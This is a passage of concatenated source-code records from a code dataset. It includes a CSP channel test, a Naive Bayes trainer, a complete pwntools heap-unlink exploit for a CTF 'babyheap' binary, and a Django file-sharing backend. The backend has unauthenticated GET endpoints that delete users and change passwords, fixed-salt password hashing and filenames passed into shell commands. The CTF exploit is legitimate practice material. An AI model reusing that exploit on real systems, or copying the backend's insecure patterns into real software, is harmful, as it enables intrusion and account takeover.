cv2.COLOR_BGR2GRAY)\n w, h = buff_icon_grey.shape[::-1]\n res = cv2.matchTemplate(buff_section_grey, buff_icon_grey, cv2.TM_CCOEFF_NORMED)\n threshold = 0.8\n loc = np.where(res >= threshold)\n print(\"BS: {}\".format(loc))\n for point in zip(*loc[::-1]):\n cv2.rectangle(buffs_section_img_copy, point, (point[0] + w, point[1] + h), (255, 255, 0), 2)\n cv2.imshow(\"bs_found.png\", buffs_section_img_copy)\n\n\n def update_debuffs(self, buffs_section_img):\n pass\n\n\n","sub_path":"src/player_properties.py","file_name":"player_properties.py","file_ext":"py","file_size_in_byte":6136,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"99243894","text":"#!/usr/bin/env python3\n# -*- coding: latin-1 -*-\n# Copyright (c) 2018 John Markus Bjørndalen, jmb@cs.uit.no.\n# See LICENSE.txt for licensing details (MIT License).\n\nfrom common import handle_common_args\nfrom apycsp import process, One2OneChannel, BlackHoleChannel, run_CSP, poisonChannel, Any2OneChannel\nfrom apycsp.plugNplay import Identity\n\nhandle_common_args()\n\n\n@process\nasync def PoisonTest(cout):\n for i in range(100):\n print(i)\n await cout(i)\n await poisonChannel(cout)\n\n\ndef test():\n a = One2OneChannel(\"a\")\n b = One2OneChannel(\"b\")\n c = One2OneChannel(\"c\")\n d = BlackHoleChannel(\"d\")\n\n run_CSP(PoisonTest(a.write),\n 
Identity(a.read, b.write),\n Identity(b.read, c.write),\n Identity(c.read, d.write))\n for ch in [a, b, c, d]:\n print(\"State of channel\", ch.name, \"- poisoned is\", ch.poisoned)\n\n\n@process\nasync def PoisonReader(cin):\n for i in range(100):\n r = await cin()\n print(i, r)\n await cin.poison()\n\n\n@process\nasync def Count(cout):\n i = 0\n while 1:\n await cout(i)\n i += 1\n\n\ndef test2():\n a = Any2OneChannel()\n run_CSP(Count(a.write),\n Count(a.write),\n PoisonReader(a.read))\n print(\"Processes done\")\n\n\nif __name__ == \"__main__\":\n test()\n test2()\n","sub_path":"test/poisoncheck.py","file_name":"poisoncheck.py","file_ext":"py","file_size_in_byte":1314,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"97791073","text":"#!/usr/bin/python\n#coding=utf-8\n#__author__:TaQini\n\nfrom pwn import *\n\nlocal_file = './babyheap'\nlocal_libc = '/lib/x86_64-linux-gnu/libc.so.6'\nremote_libc = local_libc # '../libc.so.6'\n\nis_local = False\nis_remote = False\n\nif len(sys.argv) == 1:\n is_local = True\n p = process(local_file)\n libc = ELF(local_libc)\nelif len(sys.argv) > 1:\n is_remote = True\n if len(sys.argv) == 3:\n host = sys.argv[1]\n port = sys.argv[2]\n else:\n host, port = sys.argv[1].split(':')\n p = remote(host, port)\n libc = ELF(remote_libc)\n\nelf = ELF(local_file)\n\ncontext.log_level = 'debug'\ncontext.arch = elf.arch\n\nse = lambda data :p.send(data)\nsa = lambda delim,data :p.sendafter(delim, data)\nsl = lambda data :p.sendline(data)\nsla = lambda delim,data :p.sendlineafter(delim, data)\nsea = lambda delim,data :p.sendafter(delim, data)\nrc = lambda numb=4096 :p.recv(numb)\nru = lambda delims, drop=True :p.recvuntil(delims, drop)\nuu32 = lambda data :u32(data.ljust(4, '\\0'))\nuu64 = lambda data :u64(data.ljust(8, '\\0'))\ninfo_addr = lambda tag :p.info(tag + ': {:#x}'.format(eval(tag)))\n\ndef debug(cmd=''):\n if is_local: gdb.attach(p,cmd)\n\ndef add(sz,data):\n ru(\">>\")\n sl(\"1\")\n ru(\"size?\")\n sl(str(sz))\n ru(\"content?\")\n sl(data)\n\ndef delete(idx):\n ru(\">>\")\n sl(\"2\")\n ru(\"index ?\")\n sl(str(idx))\n\ndef edit(idx, data):\n ru(\">>\")\n sl(\"4\")\n ru(\"index ?\")\n sl(str(idx))\n ru(\"content ?\")\n se(data) \n\nadd(0x100-8,'0')\nadd(0x100-8,'1')\nadd(0x80-8,'2')\nadd(0x80-8,'3')\n\ndelete(1)\n\nedit(0, '0'*(0x100-8) + '\\x81')\n\nadd(0x180-8,'1')\n\nedit(1,p64(0x00) + p64(0x00) + p64(0x602160+8-24) + p64(0x602160+8-16) + (0x100-8-32-8)*'1' + p64(0xf0) + p64(0x80))\ndelete(2)\n\nedit(1,'A'*16 + p64(elf.got['puts']))\n\n# debug()\nsh = 0x40097F\nedit(0, p64(sh))\n\np.interactive()","sub_path":"unctf2020/pwn/babyheap/babyheap.py","file_name":"babyheap.py","file_ext":"py","file_size_in_byte":1958,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"191101753","text":"\"\"\"\nThis module implements a Multinomial Naive Bayes classifier using sklearn.\nThe classifier is saved to a pkl file for future use.\nTests are performed at the end to make sure the model is valid.\n\"\"\"\nimport numpy as np\nfrom sklearn.feature_extraction.text import CountVectorizer, TfidfTransformer\nfrom sklearn.naive_bayes import MultinomialNB\nfrom sklearn.externals import joblib\nfrom sqlalchemy import create_engine\n\n# Because our data set is small, we can save it to RAM. 
However, if we have a massive\n# dataset, we should save the data to disk or read it from a generator.\n\nLANGUAGES = ['en', 'sv', 'de', 'fr', 'nl', 'ru', 'it', 'es', 'pl', 'vi', 'pt', 'uk', 'fa', 'sco'\n ]\n\nTRAINING_DATA = []\n\n# Connect to database and read information into the TRAININ_DATA list.\ndb = create_engine('sqlite:///scraper/language_data.db')\nconn = db.connect()\nres = conn.execute('select * from train')\nfor row in res:\n TRAINING_DATA.append(row['text'])\n\n\nTRAINING_SET = np.array(TRAINING_DATA) #np.concatenate([language for language in TRAINING_DATA])\n\n# Read in the target int for each language.\nTARGETS = np.array([i for i in range(len(LANGUAGES))])\n\n# This turns a collection of text data into a matrix of frequency counts.\nCOUNT_VECT = CountVectorizer()\nTRAIN_COUNTS = COUNT_VECT.fit_transform(TRAINING_SET)\n\n# tfidTransformer scales down the impact of very frequent tokens -- things like stopwords.\n# http://scikit-learn.org/stable/modules/generated/sklearn.feature_extraction.text.TfidfTransformer.html\nTDIDF_TRANSFORMER = TfidfTransformer()\nTRAIN_TFIDF = TDIDF_TRANSFORMER.fit_transform(TRAIN_COUNTS)\n\n# Train a multinomial Naive Bayes classifier.\nCLASSIFIER = MultinomialNB().fit(TRAIN_TFIDF, TARGETS)\n\n# Save the results of the classifier and the vectorizer so that it does not need to be trained at runtime.\njoblib.dump(COUNT_VECT, 'model/count_vect.pkl')\njoblib.dump(TDIDF_TRANSFORMER, 'model/tdidf_transformer.pkl')\njoblib.dump(CLASSIFIER, 'model/classifier.pkl')\n","sub_path":"model/generate_model.py","file_name":"generate_model.py","file_ext":"py","file_size_in_byte":1978,"program_lang":"python","lang":"en","doc_type":"code","dataset":"code-starcoder2","pt":"32"} +{"seq_id":"365978064","text":"# encoding: utf-8\nfrom __future__ import division\nfrom Project.models import *\nfrom django.http import JsonResponse,HttpResponse\nimport hashlib\nimport os\nimport base64\nimport datetime\nimport json\nfrom collections import Iterable\nfrom django.utils import timezone\nimport subprocess\nimport time\nimport pexpect\nfrom django.core.files.storage import FileSystemStorage\nfrom wand.image import Image\nfrom wand.color import Color\nfrom PyPDF2 import PdfFileReader, PdfFileWriter\nimport math\nimport glob\nimport io\n# Create your views here.\nfilesrc = r\"http://lvmaozi.info:9999/\"\nglobalUserId = 0\ndef convert_video(video_input, video_output):\n # cmds = ['ffmpeg', '-i', video_input, video_output]\n # subprocess.Popen(cmds)\n\n\n cmd = 'ffmpeg -i'+' '+video_input+' '+video_output\n thread = pexpect.spawn(cmd)\n print (\"started %s\" % cmd)\n cpl = thread.compile_pattern_list([\n pexpect.EOF,\n \"frame= *\\d+\",\n '(.+)'\n ])\n while True:\n i = thread.expect_list(cpl, timeout=None)\n if i == 0: # EOF\n print\n \"the sub process exited\"\n break\n elif i == 1:\n frame_number = thread.match.group(0)\n print(frame_number)\n thread.close\n elif i == 2:\n # unknown_line = thread.match.group(0)\n # print unknown_line\n pass\n\ndef convert_word(input):\n end_length = len(input.split('.')[-1]) + 1\n name = input[0:-end_length]\n cmd = 'libreoffice --convert-to pdf %s' % input\n os.system(cmd)\n name = name.split('/')[-1] + '.pdf'\n return name\n\ndef login(request):\n if request.method ==\"POST\":\n try:\n username = json.loads(request.body)['username']\n password = json.loads(request.body)['password']\n if username: # 确保用户名和密码都不为空\n\n username = username.strip()\n # 用户名字符合法性验证\n # 密码长度验证\n # 更多的其它验证.....\n try:\n user = User.objects.get(username=username)\n id = 
user.id\n\n                    if user.password == hash_code(password):\n                        message = \"Login successful!\"\n                        success = True\n                        Userinfo = User.objects.get(id=id)\n                        expires = Userinfo.authTime/1440\n                        if expires == 0:\n                            return JsonResponse({\"success\":False,\"data\":\"You don't have permission\"}, safe=False)\n                        token = hashlib.sha1(os.urandom(24)).hexdigest()\n                        print(token)\n                        Token.objects.create(username_id=id,Token=token,createDate=timezone.now(),expires=expires)\n                        global globalUserId\n                        globalUserId = id\n                        Data = {\"isManager\": user.isManager, \"token\": token, \"expires\":expires, \"visit_time\":expires*60*60*24*1000}\n                        # response = HttpResponse('ok')\n                        # response.set_cookie(response,'ok','ok')\n                        # print(token)\n                        # return HttpResponse(json.dumps({\"msg\": \"ok!\"}))\n                    else:\n                        success = False\n                        Data = \"Wrong Password!\"\n                        return JsonResponse({\"success\": success, \"data\": Data})\n                except Exception as e:\n                    success = False\n                    # Data = str(e)\n                    # token = '1'\n                    Data = \"Username is wrong!\"\n                    return JsonResponse({\"success\": success, \"data\": Data})\n                # except:\n                #     success = False\n                #     Data = \"Username does not exist!\"\n        except Exception as e:\n            success = False\n            Data = str(e)\n            token = '2'\n            return JsonResponse({\"success\": success, \"data\": Data})\n        resp = JsonResponse({\"success\":success,\"data\":Data}, safe=False)\n        resp.set_cookie('token', token)\n        resp.set_cookie('isManager', user.isManager)\n        resp.set_cookie('visit_time', expires*60*60*24)\n        if user.isManager == False and user.authTime != 999999:\n            User.objects.filter(id=id).update(authTime=0)\n        return resp\n\n\ndef register(request):\n    if request.method == \"POST\":\n        Data = []\n        try:\n            username = json.loads(request.body)['username']\n            password = json.loads(request.body)['password']\n            email = json.loads(request.body)['email']\n            same_name_user = User.objects.filter(username=username)\n            if same_name_user: # username must be unique\n                Data = 'User already exists, please choose another username!'\n                success = False\n                return JsonResponse({\"success\": success, \"data\": Data})\n            User.objects.create(username=username, password=hash_code(password), email=email, createDate=datetime.datetime.now())\n            message = \"Registration successful\"\n            success = True\n            return JsonResponse({\"success\": success, \"data\": Data})\n        except Exception as e:\n            success = False\n            Data = str(e)\n            return JsonResponse({\"success\": success, \"data\": Data})\n\ndef hash_code(s): # add a little salt\n    h = hashlib.sha256()\n    salt = 'mysite'\n    c = salt+s\n    h.update(c.encode()) # the update method only accepts bytes\n    return h.hexdigest()\n\ndef searchuser(request):\n    if request.method == \"GET\":\n        username = request.GET.get('username')\n        users = User.objects.filter(username__icontains=username)\n        jsonArry = []\n        if users: # if any users matched\n            try:\n                for user in users:\n                    name = user.username\n                    authtime = user.authTime\n                    jsonObj = {\"username\":name,\"authtime\":authtime}\n                    jsonArry.append(jsonObj)\n            except:\n                jsonArry.append({\"username\":name,\"authtime\":authtime})\n        return JsonResponse(jsonArry, safe=False) # return the list as JSON\n\ndef change_info(request):\n    if request.method == \"GET\":\n        username = request.GET.get('username')\n        password = request.GET.get('password')\n        new_password = request.GET.get('New_password')\n        message = \"All fields are required!\"\n        if username and password: # make sure neither username nor password is empty\n            username = username.strip()\n            # validate the characters in the username\n            # validate the password length\n            # more validation .....\n            try:\n                user = User.objects.get(username=username)\n                if user.password == hash_code(password):\n                    User.objects.filter(username=username).update(password=hash_code(new_password))\n                    message = \"Modification successful\"\n                    status = 1\n                    return 
JsonResponse({\"status\": status}) # 成功修改\n else:\n status = -1\n message = \"密码不正确!\"\n except:\n status = 0\n message = \"用户名不存在!\"\n return JsonResponse({\"status\": status})\n return JsonResponse({\"status\": status})\n\ndef deluser(request):\n if request.method == \"GET\":\n username = request.GET.get('username')\n # try:\n File_User.objects.filter(username_id=username).delete()\n User.objects.filter(username=username).delete()\n status = 1\n # except:\n status = 0\n return JsonResponse({\"status\": status})\n\n\n# def addkey(request):\n# if request.method == \"GET\":\n# key = request.GET.get('key')\n# authlevel = request.GET.get('authlevel')\n# authtime = request.GET.get('authtime')\n# files = request.GET.get('file') #每个文件访问时间,是一个二重Json文件,有fileaddress,time\n# new_key = Auth.objects.create()\n# new_key.key = key\n# new_key.authlevel = authlevel\n# new_key.authtime = authtime\n# new_file_user = File_User.objects.create()\n# for file in files:\n# new_file_user.key_id = key\n# new_file_user.filename_id = file.filename\n# new_file_user.time = file.time\n# new_key.save()\n# new_file_user.save()\n# return JsonResponse({\"status\":1})\n\n# def delectkey(request): #访问到时间了就删除\n# if request.method == \"GET\":\n# key = request.GET.get('key')\n# File_User.objects.filter(key = key).delete()\n# Auth.objects.filter(key=key).delete()\n# return JsonResponse({\"status\": 1})\ndef buildauth(request):#创建访问权限\n if request.method == \"GET\":\n # try:\n username = request.GET.get('username')\n filename = request.GET.get('filename')\n time = request.GET.get('time')\n File_User.objects.create(username_id=username, filename_id=filename, time=time)\n status = 1\n # except:\n # status = 0\n return JsonResponse({\"status\": status})\n\ndef delauth(request):#删除访问权限\n if request.method == \"GET\":\n username = request.GET.get('username')\n filename = request.GET.get('filename')\n File_User.objects.filter(username_id=username, filename_id=filename).delete()\n return JsonResponse({\"status\": 1})\n\ndef changeauth(request):#修改访问权限\n if request.method == \"GET\":\n username = request.GET.get('username')\n filename = request.GET.get('filename')\n time = request.GET.get('time')\n File_User.objects.filter(username_id=username, filename_id=filename).update(time=time)\n return JsonResponse({\"status\": 1})\n\ndef changeauthtime_user(request): #修改该用户访问权限\n if request.method == \"GET\":\n username = request.GET.get('username')\n authtime = request.GET.get('authtime')\n User.objects.filter(username=username).update(authtime=authtime)\n return JsonResponse({\"status\": 1})\n\ndef clearauth_user(request): #清空该用户权限\n if request.method == \"GET\":\n username = request.GET.get('username')\n try:\n authtime = 0\n File_User.objects.filter(username_id=username).delete()\n User.objects.filter(username=username).update(authtime=authtime)\n status = 1\n except:\n status = 0\n return JsonResponse({\"status\": status})\n\ndef searchauth_user(request): #查找该用户权限\n if request.method == \"GET\":\n username = request.GET.get('username')\n Auth_obj = File_User.objects.filter(username_id=username)\n AuthArray = []\n try:\n for auth in Auth_obj:\n filename = auth.filename_id\n time = auth.time\n authArray = {\"filename\":filename,\"time\": time}\n AuthArray.append(authArray)\n Result = {\"username\": username, \"auth\": AuthArray}\n except:\n Result = {\"username\": username, \"auth\": [{\"filename\":filename,\"time\": time}]}\n return JsonResponse(Result,safe=False)\n\ndef clearauth_file(request): #清空该文档权限\n if request.method == \"GET\":\n 
filename = request.GET.get('filename')\n        try:\n            File_User.objects.filter(filename_id=filename).delete()\n            status = 1\n        except:\n            status = 0\n        return JsonResponse({\"status\": status})\n\ndef searchauth_file(request): # look up this file's permissions\n    if request.method == \"GET\":\n        filename = request.GET.get('filename')\n        Auth_obj = File_User.objects.filter(filename_id=filename)\n        AuthArray = []\n        try:\n            for auth in Auth_obj:\n                username = auth.username_id\n                time = auth.time\n                authArray = {\"username\":username,\"time\": time}\n                AuthArray.append(authArray)\n            Result = {\"filename\":filename, \"auth\": AuthArray}\n        except:\n            Result = {\"filename\":filename, \"auth\": [{\"username\":username,\"time\": time}]}\n        return JsonResponse(Result,safe=False)\n\n# def searchauth(request): # look up permissions\n#     if request.method == \"GET\":\n#         keyname = request.GET.get('keyname')\n#         keys = Auth.objects.filter(key__icontains=keyname)\n#         jsonArry= []\n#         for key in keys:\n#             authlevel = key.authlevel\n#             authtime = key.authtime\n#             files = File_User.objects.filter(key = key) # in JSON form\n#             filejson = []\n#             for file in files:\n#                 name = file.filename\n#                 time = file.time\n#                 filejson = {\"filename\": name, \"time\": time}\n#                 filejson.append(filejson)\n#             objArry = {\"key\":key, \"authlevel\":authlevel, \"authtime\":authtime, \"file\": filejson}\n#             jsonArry.append(objArry)\n#         return JsonResponse(jsonArry) # return the list as JSON\n\ndef addfile(request):\n    if request.method == \"GET\":\n        type = request.GET.get('type')\n        file_obj = request.FILES.get('file')\n        same_name = File.objects.filter(filename=file_obj.name)\n        address = '/file/'\n        if same_name: # filename must be unique\n            return JsonResponse({\"message\":\"Duplicate filename\"})\n        FileDB = File.objects.create()\n        FileDB.filename = file_obj.name\n        FileDB.type = type\n        FileDB.save()\n        fileaddress = address+file_obj.name\n        with open(fileaddress,'wb')as f:\n            for ffile in file_obj.chunks():\n                f.write(ffile)\n        return JsonResponse({\"status\": 1})\n\ndef delectfile(request):\n    if request.method == \"GET\":\n        filename = request.GET.get('filename')\n        file = File.objects.filter(filename=filename)\n        if file:\n            print(file['src'])\n            os.remove(file.src)\n            File.objects.filter(filename=filename).delete()\n        return JsonResponse({\"status\": 1})\n\ndef searchfile(request):\n    if request.method == \"GET\":\n        filename = request.GET.get('filename')\n        files = File.objects.get(filename__icontains=filename)\n        jsonArry = []\n        try:\n            for file in files:\n                name = file.filename\n                type = file.type\n        except:\n            name = files.filename\n            type = files.type\n        jsonObj = {\"filename\":name,\"type\":type}\n        jsonArry.append(jsonObj)\n        return JsonResponse(jsonArry,safe=False) # return the list as JSON\n\ndef grouplogin(request):\n    if request.method == \"GET\":\n        key = request.GET.get('key')\n        try:\n            code = base64.b32decode(key)\n            username = code.split(':')[0]\n            password = code.split(':')[1]\n            if username and password: # make sure neither username nor password is empty\n\n                username = username.strip()\n                # validate the characters in the username\n                # validate the password length\n                # more validation .....\n                try:\n                    user = User.objects.get(username=username)\n                    if user.password == hash_code(password):\n                        message = \"Login successful!\"\n                        return JsonResponse({\"status\": 1}) # login succeeded\n                        # return HttpResponse(json.dumps({\"msg\": \"ok!\"}))\n                    else:\n                        message = \"Incorrect password!\"\n                except:\n                    message = \"Username does not exist!\"\n                    return JsonResponse({\"status\": 0})\n            return JsonResponse({\"status\": 0})\n        except:\n            return JsonResponse({\"status\": 0})\n\ndef buildgroup(request):\n    if request.method == \"GET\":\n        username = request.GET.get('username')\n        password = request.GET.get('password')\n        same_name_user = 
User.objects.filter(username=username)\n        key = \"\"\n        if same_name_user: # username must be unique\n            message = 'User already exists, please choose another username!'\n            return JsonResponse({\"status\": 0, \"key\":key})\n        new_user = User.objects.create()\n        new_user.username = username\n        new_user.password = hash_code(password)\n        new_user.authTime = 0 # new users have no permission by default\n        new_user.save()\n        message = \"Registration successful\"\n        code = username+':'+password\n        key = base64.b32encode(code)\n        return JsonResponse({\"status\": 1, \"key\":key}) # jump back to the login page automatically; return accessible time and access level\n\ndef getUserList(request):\n    if request.method == \"GET\":\n        Users = User.objects.all()\n        Data = []\n        try:\n            success = True\n            if Users: # the database has data\n                if isinstance(Users, Iterable) == True:\n                    for user in Users:\n                        id = user.id\n                        username = user.username\n                        createDate = user.createDate\n                        authTime = user.authTime # added for the API\n                        userinfo = {\"id\":str(id), \"username\":username, \"createDate\":createDate, \"limit\":authTime}# added for the API\n                        Data.append(userinfo)\n                else:\n                    id = Users.id\n                    username = Users.username\n                    createDate = Users.createDate\n                    authTime = Users.authTime # added for the API\n                    Data = {\"id\": str(id), \"username\": username, \"createDate\": createDate, \"authTime\": authTime} # added for the API\n            else:\n                pass\n        except Exception as e:\n            # success = False # for testing\n            success = True\n            Data = str(e)\n        return JsonResponse({\"success\": success, \"data\": Data})\n\ndef getFileList(request):\n    if request.method == \"GET\":\n        try:\n            success = True\n            token = request.COOKIES[\"token\"]\n            tokenInfo = Token.objects.get(Token=token)\n            userid = tokenInfo.username_id\n            Userinfo = User.objects.get(id=userid)\n            creator = Userinfo.username\n            isManager = Userinfo.isManager\n            Data = []\n            if(isManager==False):\n                Fileinfo = File_User.objects.filter(username_id=userid, auth=1).order_by('-filename_id')\n                if Fileinfo:\n                    for a in Fileinfo:\n                        id = a.filename_id\n                        file = File.objects.get(id=id)\n                        id = file.id\n                        filename = file.filename\n                        content = file.content\n                        type = file.type\n                        createDate = file.createDate\n                        if (filename[0:6] == \"_fake_\"):\n                            info = {\"id\": filename, \"title\": filename, \"content\": content, \"type\": type,\n                                    \"createDate\": createDate, \"group\": charIntoarray(file.group),\"creator\":creator}\n                        else:\n                            info = {\"id\": str(id), \"title\": filename, \"content\": content, \"type\": type,\n                                    \"createDate\": createDate, \"group\": charIntoarray(file.group),\"creator\":creator}\n                        # info = {\"id\":id, \"title\":filename, \"content\":content,\"type\":type,\"createDate\":createDate,\"group\":[]}\n                        Data.append(info)\n            else:\n                Files = File.objects.all().order_by('-id')\n                try:\n                    if Files: # the database has data\n                        if isinstance(Files, Iterable) == True:\n                            for file in Files:\n                                id = file.id\n                                filename = file.filename\n                                content = file.content\n                                type = file.type\n                                createDate = file.createDate\n                                if (filename[0:6]==\"_fake_\"):\n                                    info = {\"id\": filename, \"title\": filename, \"content\": content, \"type\": type,\"createDate\": createDate,\"group\":charIntoarray(file.group),\"creator\":\"wedon\"}\n                                else:\n                                    info = {\"id\": str(id), \"title\": filename, \"content\": content, \"type\": type, \"createDate\": createDate,\"group\":charIntoarray(file.group),\"creator\":\"wedon\"}\n                                # info = {\"id\":id, \"title\":filename, \"content\":content,\"type\":type,\"createDate\":createDate,\"group\":[]}\n                                Data.append(info)\n                        else:\n                            id = Files.id\n                            filename = Files.filename\n                            content = Files.content\n                            type = Files.type\n                            createDate = Files.createDate\n                            Data = {\"id\": str(id), \"title\": filename, \"content\": content, \"type\": type, \"createDate\": 
createDate,\"group\":charIntoarray(Files.group),\"creator\":\"wedon\"}\n # Data = {\"id\": \"_fake_asdsa\", \"title\": filename, \"content\": content, \"type\": type,\"createDate\":createDate,\"group\":[111]}\n else:\n pass\n except Exception as e:\n # success = False\n success = True\n Data = str(e)\n except Exception as e:\n # success = False\n success = True\n Data = str(e)\n # response_data = {}\n # response_data['success'] = success\n # response_data['data'] = Data\n # response_data['userid'] = globalUserId\n # return HttpResponse(json.dumps(response_data), content_type=\"application/json\")\n # Data = {\"id\": \"_fake_\", \"title\": \"\", \"content\": \"\", \"type\": \"\", \"createDate\": \"\",\n # \"group\": [\"111\"]}\n return JsonResponse({\"success\": success, \"data\": Data,\"userid\":globalUserId},safe=False)\ndef postFile(request):\n if request.method ==\"POST\":\n Data = []\n try:\n success = True\n id = json.loads(request.body)['id']\n # id = request.POST.get('id')\n try:\n type = json.loads(request.body)['file']\n except:\n type = json.loads(request.body)['type']\n title = json.loads(request.body)['title']\n content = json.loads(request.body)['content']\n authUserList = json.loads(request.body)['authUserList']#API需要新增time\n print(authUserList)\n if id == \"-1\":\n File.objects.create(type=type,filename=title, content=content,createDate=datetime.datetime.now())\n lastFile = File.objects.order_by('createDate')[0:1].get()\n filename_id = lastFile.id#如果重复上传 会出BUG\n print(filename_id)\n if isinstance(authUserList,Iterable)==True:\n for authlist in authUserList:\n File_User.objects.create(filename_id=filename_id,username_id=authlist['id'], time=authlist['limit'], timeLimit=authlist['timeLimit'])\n Data = {\"title\": title, \"id\": str(filename_id)}\n else:\n File_User.objects.create(filename_id=filename_id, username_id=authUserList['id'],time=authUserList['limit'], timeLimit=authUserList['timeLimit'])\n Data = {\"title\": title, \"id\": str(filename_id)}\n else:\n if type:\n File.objects.filter(id=id).update(type=type, filename=title, content=content,createDate=datetime.datetime.now())\n else:\n File.objects.filter(id=id).update(filename=title, content=content,createDate=datetime.datetime.now())\n File_User.objects.filter(filename_id=id).delete()\n if isinstance(authUserList, Iterable) == True:\n for authlist in authUserList:\n File_User.objects.create(filename_id=id, username_id=authlist['id'], time=authlist['limit'], timeLimit=authlist['timeLimit'])\n print(1)\n Data = {\"title\": title, \"id\":str(id)}\n else:\n File_User.objects.create(filename_id=id, username_id=authUserList['id'], time=authUserList['limit'], timeLimit=authUserList['timeLimit'])\n Data = {\"title\": title, \"id\": str(id)}\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n\ndef uploadFile(request):\n if request.method ==\"POST\":\n Data = []\n try:\n success = True\n id = request.POST.get('id')\n print(id)\n title = request.POST.get('title','')\n content = request.POST.get('content','')\n type = request.POST.get('type','')\n file_obj = request.FILES['file']\n group = request.POST.get('group')\n name = os.path.splitext(file_obj.name)[0]\n address = os.path.splitext(file_obj.name)[-1]\n src = hash_code(name)+address #到时候修改成服务器的地址\n print(\"FIletype:\"+address)\n print(src)\n if id == \"-1\":\n # if address == '.pdf' or address == '.PDF': #切片操作\n # with open(src, 'wb')as f:\n # for ffile in file_obj.chunks():\n # f.write(ffile)\n # inputpdf 
= PdfFileReader(open(src, \"rb\"))\n # output = PdfFileWriter()\n # print(\"1\")\n # for i in range(inputpdf.numPages):\n # output.addPage(inputpdf.getPage(i))\n # # output.encrypt(user_pwd=\"wyd\",owner_pwd=\"None\",use_128bit=True,allow_printing=False, allow_commenting=False,overwrite_permission=False)\n # pagesrc = src+\"-page%s.pdf\" % (i+1)\n # print(pagesrc)\n # with open(pagesrc, \"wb\") as outputStream: #页码\n # output.write(outputStream)\n # File.objects.create(filename=title, type=type, content=content, createDate=datetime.datetime.now(),src=filesrc + src,group=group)\n #\n with open(src, 'wb')as f:\n for ffile in file_obj.chunks():\n f.write(ffile)\n if address == '.avi' or address =='.AVI'or address =='.asf'or address =='.ASF' or address =='.wav'or address =='.WAV' or address =='.flv'or address =='.FLV' or address =='.siff'or address =='.SIFF':\n print(\"filetype: video\")\n convert_video(src,hash_code(name)+'.mp4')\n # time.sleep(5)\n os.remove(src)\n newsrc = hash_code(name)+'.mp4'\n File.objects.create(filename=title, type=type, content=content,createDate=datetime.datetime.now(), src=filesrc+newsrc,group=group)#我认为下面还要返回id\n elif address == '.docx' or address =='.doc':\n newsrc = convert_word(src)\n os.remove(src)\n File.objects.create(filename=title, type=type, content=content, createDate=datetime.datetime.now(),\n src=filesrc + newsrc, group=group)\n else:#不准确\n File.objects.create(filename=title, type=type, content=content, createDate=datetime.datetime.now(),src=filesrc+ src,group=group)\n\n lastFile = File.objects.order_by(\"-createDate\")[0:1].get()\n id = lastFile.id\n print(id)\n Data = {\"title\": title, \"id\": str(id), \"type\":type}\n else:\n # if address == '.pdf': #切片操作\n # inputpdf = PdfFileReader(open(src, \"wb\"))\n # for i in range(inputpdf.numPages):\n # output = PdfFileWriter()\n # output.addPage(inputpdf.getPage(i))\n # with open(src+\"-page%s.pdf\" % i, \"wb\") as outputStream: #页码\n # output.write(outputStream)\n # File.objects.filter(id=id).update(filename=title, type=type, content=content,createDate=datetime.datetime.now(),src=filesrc+src,group=group)\n # else:\n with open(src, 'wb')as f:\n for ffile in file_obj.chunks():\n f.write(ffile)\n if address == '.avi' or address =='.AVI'or address =='.asf'or address =='.ASF' or address =='.wav'or address =='.WAV' or address =='.flv'or address =='.FLV' or address =='.siff'or address =='.SIFF':\n convert_video(src,hash_code(name)+'.mp4')\n # time.sleep(5)\n os.remove(src)\n newsrc = hash_code(name)+'.mp4'\n File.objects.create(filename=title, type=type, content=content,createDate=datetime.datetime.now(), src=filesrc+newsrc,group=group)#我认为下面还要返回id\n if address == '.jpg' or address == '.JPG' or address == '.png' or address == '.PNG' or address == '.gif' or address == '.GIF':#不准确\n print(\"filetype:img\")\n File.objects.create(filename=title, type=type, content=content, createDate=datetime.datetime.now(),src=filesrc + src,group=group)\n else:\n print(\"error\")\n success = False\n Data = {\"title\": title, \"id\": str(id), \"type\": type}\n except Exception as e:\n success = False\n Data = str(e)\n return JsonResponse({\"success\": success, \"data\": Data})\n\ndef postUser(request):\n if request.method ==\"POST\":\n Data = []\n try:\n success = True\n id = json.loads(request.body)['id']\n username = json.loads(request.body)['username']\n email = json.loads(request.body)['email']\n try:\n password = json.loads(request.body)['password']\n except:\n pass\n limit = json.loads(request.body)['limit']#API请求参数新增 
authtime\n if limit is None:\n limit = 999999\n print(limit)\n authFileList = json.loads(request.body)['authFileList']#API请求参数新增 time\n print(authFileList)\n if id == -1:\n User.objects.create(username=username, email=email, password=hash_code(password),createDate=datetime.datetime.now(),authTime=limit)\n username_id = User.objects.all()[0].id\n if isinstance(authFileList, Iterable) == True:\n for authlist in authFileList:\n if authlist['id'][0:6]==\"_fake_\":\n fakeid = File.objects.get(filename=authlist['id']).id\n File_User.objects.create(auth=1,username_id=username_id, filename_id=fakeid,time=authlist['limit'],timeLimit=authlist['timeLimit'])\n else:\n File_User.objects.create(auth=1,username_id=username_id,filename_id=authlist['id'], time=authlist['limit'],timeLimit=authlist['timeLimit'])\n else:\n File_User.objects.create(auth=1,username_id=username_id, filename_id=authFileList['id'],time=authFileList['limit'],timeLimit=authFileList['timeLimit'])\n # fakeFileInfo = FIle.objects.filter(filename__contains='fake')\n # for fakeinfo in fakeFileInfo:\n # File_User.objects.create(username_id=username_id,filename_id=fakeinfo[id]) #创建文件夹权限表\n else:\n if password:\n User.objects.filter(id=id).update(username=username, email=email, password=hash_code(password),createDate=datetime.datetime.now(),authTime=limit)\n else:\n User.objects.filter(id=id).update(username=username, email=email,createDate=datetime.datetime.now(),authTime=limit)\n # ,authtime=authtime\n\n for authFile in authFileList:\n if authFile['id'][0:6] == \"_fake_\":\n filename_id = File.objects.get(filename=authFile['id']).id\n File_User.objects.filter(username_id=id, filename_id=filename_id).delete()\n # fakeid = File.objects.get(filename=authlist['id']).id\n # File_User.objects.create(username_id=username_id, filename_id=fakeid, time=authlist['limit'])\n fakefileinfo = File.objects.filter(filename__contains='fake')\n fakeinfolist=[]\n for fakefile in fakefileinfo:\n fakefileid=fakefile.id\n fakeinfolist.append(fakefileid)\n File_User.objects.filter(username_id=id).exclude(filename_id__in=fakeinfolist).delete()\n if isinstance(authFileList, Iterable) == True:\n for authlist in authFileList:\n if 